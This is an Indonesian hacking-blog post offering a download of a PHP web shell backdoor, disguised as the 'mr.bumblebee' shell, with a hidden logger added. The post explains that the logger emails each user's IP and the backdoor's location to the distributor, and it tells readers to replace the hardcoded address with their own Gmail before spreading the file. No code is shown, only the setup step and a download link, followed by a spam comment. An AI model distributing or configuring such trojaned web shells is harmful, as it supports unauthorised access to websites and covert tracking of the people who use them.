Download Mini Shell Logger Backdoor

Yoyoyo
Kali ini gua bakal share mini shell backdoor yang udah disisipi logger.
Kalian tau kan? Marak maraknya logger sekarang?
Sebenernya ini juga udah tools lama juga sih.
Yang katanya bisa tau apa yang kita upload?
Jadi gini sob
Logger ini bisa mencatat ip kita dan apa yang kita upload pada shell yang udah disisipi logger.

Jadi buat kalian kang dorking kerang(shell)
Hati hati ae ip kalian bisa di dapet ma pemilik shell wkwk.

Biasanya tehnik logger ini digunakan oleh kang web (seo).
Ia sengaja menempatkan shell backdoor yang sudah dimodif dan disisipi logger agar jika ada hacker yang mengakses shellnya,
Ipnya itu bisa ketangkap sama admin webnya dengan mudah.
Tapi sama heker dimodif dan ditambahin fitur baca log jadi scriptnya bisa membaca jejak pada browser kyta.

So easy buat ngelacak kalau udah ada ip.
Yakan?

Jadi cara kerjanya itu gini broo.

Setelah kita sebar file yang sudah kita sisipkan logger.
Kalian tinggal menunggu email masuk.
Seperti gambar diatas.. Link backdoor target & IP masuk secara otomatis ke Email yang sudah kalian isi tadi.

Nah ngerti kan ?
Jadi yaudah deh w share aja.
Pada dalam shell kalian ganti tulisan :
inputby@nts7.net dengan gmail kalian.
Misalnya : inputby@nts7.net diubah ke akuwibuamatir@gmail.com.

Nah gitu gan.
Bentar gua kasih screenshotnya
Tampilan mah tetep kayak biasanya btw gua pasang logger di shell mr.bumblebee
Kan shellnya udah ga asing jadi buat penyamaran aja wkwk.

Fitur shell :
-Tetep ae kek biasa bambank cuman udah disisipi logger.

Nah jadi begitu tampilan singkatnya.
Link download :
ShellBackdoorLogger.php

Jan lupa komentar karna kolom komentar terbuka lebar
Bagi yang mau request juga boleh
Atau engga lewat fanspage aja.

3 Responses to "Download Mini Shell Logger Backdoor "

  1. Great job here on _______ I read a lot of blog posts, but I never heard a topic like this. I Love this topic you made about the blogger's bucket list. Very resourceful. ibmseotips

    ReplyDelete

Berkomentar dengan bijak dan sopan adalah salah satu cara agar cepat direspon oleh admin

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel